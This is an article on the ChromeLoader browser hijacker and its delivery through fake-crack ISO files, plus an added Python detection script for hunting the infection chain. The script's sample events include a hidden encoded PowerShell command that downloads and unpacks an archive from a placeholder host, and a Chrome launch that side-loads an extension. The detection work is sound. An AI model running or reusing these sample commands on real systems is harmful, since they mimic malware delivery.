During May there was a notable spread of the ChromeLoader malware, which lets its operators hijack the victim's browser to promote unwanted software, open pages devoted to surveys and sweepstakes, and push adult games and bogus dating sites, all with the aim of earning money through affiliate schemes. Among the many browser hijackers in circulation, ChromeLoader stands out for its persistence on infected systems, for how widely it has spread and for an infection method that makes heavy use of PowerShell.
Researchers at Red Canary have been tracking this malware since February and have identified its primary attack vector: an ISO image file that the criminals use to infect victims' systems. The ISO is disguised as a cracked executable for games or pirated commercial software, and users download it themselves from compromised sites or from sites hosting torrent lists. The campaign was also promoted on Twitter, with posts advertising cracked Android games and QR codes that sent users to the malicious sites.
Malware often affects web browsers
Once the ISO was mounted as a virtual drive on Windows, the user found an executable inside it posing as a crack or keygen (a program that generates bogus license codes). Running it started ChromeLoader, which decrypted a PowerShell command that fetched a remote archive and loaded it as a Google Chrome extension. When the operation finished there was no trace of the activity, only the extension, which quietly redirected Chrome to the sites the operators were interested in. A macOS variant was also found: there the infected files were DMG images containing a bash script able to download the ChromeLoader extension and unpack it into a temporary directory.
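The chain described above (fake crack on a mounted ISO, hidden PowerShell with an encoded command that fetches an archive, Chrome started with an unpacked extension) can be hunted for in process-creation telemetry. The script below is an added example written for this page, not code from Red Canary or from the original article. It assumes a simplified record format of (parent image, image, command line), assumes the system volume is C: so that a mounted ISO appears under another drive letter, assumes Chrome is relaunched with the `--load-extension` switch, and uses a constructed set of sample events and an assumed list of download indicators; none of these details are from the page.

```python
"""Hunt for a ChromeLoader-style infection chain in process-creation records.
Added example (not from the original article or Red Canary). Log layout,
drive letter, indicator strings and sample events are assumptions."""
import base64
import re

SYSTEM_DRIVE = "C:"  # assumption: OS volume; a mounted ISO gets a different letter

# Assumed indicators that a decoded PowerShell command fetches/unpacks a remote archive
DOWNLOAD_INDICATORS = ("invoke-webrequest", "downloadstring", "downloadfile",
                       "net.webclient", "expand-archive")

# powershell.exe switches that take a base64(UTF-16LE) script as the next token
ENC_FLAGS = {"-encodedcommand", "-enc", "-ec", "-e"}

RULE_ISO_PS = "encoded PowerShell spawned from a non-system volume (mounted ISO?)"
RULE_FETCH = "encoded PowerShell fetches/unpacks a remote archive"
RULE_EXT = "Chrome started with an unpacked extension from a temp/profile directory"


def decode_encoded_command(command_line):
    """Return the script behind -EncodedCommand (UTF-16LE base64), or None."""
    tokens = command_line.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in ENC_FLAGS:
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def is_on_system_drive(path):
    return path.upper().startswith(SYSTEM_DRIVE.upper())


def hunt(events):
    """Return (event index, rule) pairs for records matching the chain."""
    findings = []
    for idx, (parent, image, cmd) in enumerate(events):
        image_name = image.rsplit("\\", 1)[-1].lower()
        if image_name == "powershell.exe":
            decoded = decode_encoded_command(cmd)
            if decoded is None:
                continue
            if not is_on_system_drive(parent):
                findings.append((idx, RULE_ISO_PS))
            if any(ind in decoded.lower() for ind in DOWNLOAD_INDICATORS):
                findings.append((idx, RULE_FETCH))
        elif image_name == "chrome.exe":
            m = re.search(r'--load-extension=("?)([^"\s]+)', cmd, re.IGNORECASE)
            if m and re.search(r"\\(temp|appdata)\\", m.group(2), re.IGNORECASE):
                findings.append((idx, RULE_EXT))
    return findings


def _enc(script):
    """Encode a script the way powershell.exe -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CHROME_EXE = r"C:\Program Files\Google\Chrome\Application\chrome.exe"

# Constructed sample events (not real telemetry): (parent_image, image, command_line)
SAMPLE_EVENTS = [
    # 0: user runs the fake crack from the mounted ISO (drive E:)
    (r"C:\Windows\explorer.exe", r"E:\Setup_Crack.exe", r"E:\Setup_Crack.exe"),
    # 1: the fake crack launches hidden, encoded PowerShell that fetches and unpacks an archive
    (r"E:\Setup_Crack.exe", PS_EXE,
     "powershell.exe -WindowStyle Hidden -EncodedCommand " + _enc(
         r"Invoke-WebRequest http://ext.invalid/ext.zip -OutFile $env:TEMP\ext.zip; "
         r"Expand-Archive $env:TEMP\ext.zip $env:TEMP\ext")),
    # 2: Chrome is relaunched with the unpacked extension side-loaded from %TEMP%
    (PS_EXE, CHROME_EXE, r'"chrome.exe" --load-extension="C:\Users\alice\AppData\Local\Temp\ext"'),
    # 3: benign encoded PowerShell from an admin script on the system drive
    (r"C:\Windows\System32\cmd.exe", PS_EXE, "powershell.exe -EncodedCommand " + _enc("Get-Date")),
    # 4: ordinary Chrome start
    (r"C:\Windows\explorer.exe", CHROME_EXE, '"chrome.exe" --profile-directory=Default'),
]

if __name__ == "__main__":
    for idx, rule in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

Event 1 triggers both PowerShell rules and event 2 the Chrome rule, while the benign encoded command in event 3 and the plain Chrome start in event 4 produce nothing. In real telemetry the drive-letter check is only a heuristic (USB sticks and network shares also get non-system letters), so treat it as a correlation signal next to the encoded-command decoding rather than as an alert on its own.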
To get rid of the threat, both Google and Apple have published dedicated guides, freely available:
As always, we remind you that downloading pirated material is not only illegal but also very dangerous: it exposes you to serious risks, not least the possibility of suffering a ransomware attack.